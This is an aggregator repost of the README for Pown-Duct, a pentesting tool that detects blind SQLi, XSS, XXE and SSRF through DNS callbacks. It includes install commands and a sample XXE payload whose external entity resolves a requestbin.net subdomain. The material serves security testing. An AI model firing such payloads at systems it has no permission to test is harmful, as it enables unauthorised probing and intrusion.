1. IT-Security >
  2. Cyber Security Nachrichten >
  3. Pown-Duct - Essential Tool For Finding Blind Injection Attacks


ArabicEnglishFrenchGermanGreekItalianJapaneseKoreanPersianPolishPortugueseRussianSpanishTurkishVietnamese

Pown-Duct - Essential Tool For Finding Blind Injection Attacks

RSS Kategorie Pfeil IT Security Nachrichten vom | Quelle: feedproxy.google.com Direktlink öffnen


Essential tool for finding blind injection attacks using DNS side-channels.

Credits
This tool is part of secapps.com open-source initiative.
  ___ ___ ___   _   ___ ___  ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com
NB: This tool is taking advantage of http://requestbin.net service. Future versions will use a dedicated, custom-built infrastructure.

Quickstart
This tool is meant to be used as part of Pown.js but it can be invoked separately as an independent tool.
Install Pown first as usual:
$ npm install -g [email protected]
Invoke directly from Pown:
$ pown duct
Otherwise, install this module locally from the root of your project:
$ npm install @pown/duct --save
Once done, invoke pown cli:
$ ./node_modules/.bin/pown-cli duct
You can also use the global pown to invoke the tool locally:
$ POWN_ROOT=. pown duct

Usage
pown duct <command>

Side-channel attack enabler

Commands:
pown duct dns DNS ducting

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown duct dns
pown duct dns

DNS ducting

Options:
--version Show version number [boolean]
--help Show help [boolean]
--channel Restore channel [string]
--output Output format [string] [choices: "string", "hexdump", "json"] [default: "string"]

Tutorial
There are cases when we need to perform an attack such as sql injection, XSS, XXE or SSRF but the target application is not providing any indication that it is vulnerable. One way to be sure if a vulnerability is present is to try to inject a valid attack vector which forces a DNS resolver to ask for a controlled domain. If the resolution is successful, the attack will be considered successful.
NOTE: You might be familiar with Burp Collaborator which provides a similar service for customers.
First, we need a disposable dns name to resolve:
$ pown duct dns


Using the provided DNS, compose your payload. For example, the following could trigger a DNS resolution if a XXE vulnerability is present.
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>
If the attack was successful, we will get a message in the terminal.



...

Webseite öffnen Komplette Webseite öffnen

Newsbewertung

Kommentiere zu Pown-Duct - Essential Tool For Finding Blind Injection Attacks






Ähnliche Beiträge

  • 1. Pown Recon - A Powerful Target Reconnaissance Framework Powered By Graph Theory vom 1520.68 Punkte ic_school_black_18dp
    Pown Recon is a target reconnaissance framework powered by graph theory. The benefit of using graph theory instead of flat table representation is that it is easier to find the relationships between different types of information which comes quite handy
  • 2. Pown-Duct - Essential Tool For Finding Blind Injection Attacks vom 1172.95 Punkte ic_school_black_18dp
    Essential tool for finding blind injection attacks using DNS side-channels.CreditsThis tool is part of secapps.com open-source initiative. ___ ___ ___ _ ___ ___ ___ / __| __/ __| /_\ | _ \ _ \/ __| \__ \ _| (__ / _ \| _/ _/\__ \ |___/___\___/_/ \_\_| |
  • 3. Exploit CVE-2017-6079 - Blind Command Injection In Edgewater Edgemarc Devices vom 153.65 Punkte ic_school_black_18dp
    This exploit was developed based on the technical description by depthsecurity https://depthsecurity.com/blog/cve-2017-6079-blind-command-injection-in-edgewater-edgemarc-devicesDescriptionThe HTTP web-management application on Edgewater Networks Edgemarc ap
  • 4. BSQLinjector – Blind SQL Injection Tool Download in Ruby vom 123.34 Punkte ic_school_black_18dp
    BSQLinjector is an easy to use Blind SQL Injection tool in Ruby, that uses blind methods to retrieve data from SQL databases. The download is below. The author recommends using the “--test” switch to clearly see how configured payload looks like before sending
  • 5. Malcolm - A Powerful, Easily Deployable Network Traffic Analysis Tool Suite For Full Packet Capture Artifacts (PCAP Files) And Zeek Logs vom 119.5 Punkte ic_school_black_18dp
    Malcolm is a powerful network traffic analysis tool suite designed with the following goals in mind: Easy to use – Malcolm accepts network traffic data in the form of full packet capture (PCAP) files and Zeek (formerly Bro) logs. These artifacts can be
  • 6. Tool-X - A Kali Linux Hacking Tool Installer vom 110.3 Punkte ic_school_black_18dp
    What is Tool-X ?Tool-X is a kali linux hacking Tool installer. Tool-X is Developed By Rajkumar Dusad. with the help of Tool-X you can install best hacking tools in Rooted or Non Rooted Android devices. In the Tool-X there are almost 240 hacking tools availab
  • 7. Dr. ROBOT - Tool To Enumerate The Subdomains Associated With A Company By Aggregating The Results Of Multiple OSINT Tools vom 98.99 Punkte ic_school_black_18dp
    Dr. ROBOT is a tool for Domain Reconnaissance and Enumeration. By utilizing containers to reduce the overhead of dealing with dependencies, inconsistency across operating sytems, and different languages, Dr. ROBOT is built to be highly portable and configurable.U
  • 8. Blind veteran catches second wave with a surfboard and iPhone vom 98.24 Punkte ic_school_black_18dp
    Blind veteran catches second wave with a surfboard and iPhone<br/>Scott Leason is an early riser. By 5:30 a.m., he’s checked his email, social media, the news and the weather. He’s reviewed the day’s surf reports via the Surfline app on his
  • 9. AA18-284A: Publicly Available Tools Seen in Cyber Incidents Worldwide vom 88.32 Punkte ic_school_black_18dp
    Original release date: October 11, 2018Summary This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States.[1][2][3][4][5] In it we highlight the use of five publicly a
  • 10. AA18-284A: Publicly Available Tools Seen in Cyber Incidents Worldwide vom 88.32 Punkte ic_school_black_18dp
    Original release date: October 11, 2018Summary This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States.[1][2][3][4][5] In it we highlight the use of five publicly a
  • 11. AA18-284A: Publicly Available Tools Seen in Cyber Incidents Worldwide vom 88.32 Punkte ic_school_black_18dp
    Original release date: October 11, 2018Summary This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States.[1][2][3][4][5] In it we highlight the use of five publicly a
  • 12. AA18-284A: Publicly Available Tools Seen in Cyber Incidents Worldwide vom 88.32 Punkte ic_school_black_18dp
    Original release date: October 11, 2018Summary This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States.[1][2][3][4][5] In it we highlight the use of five publicly a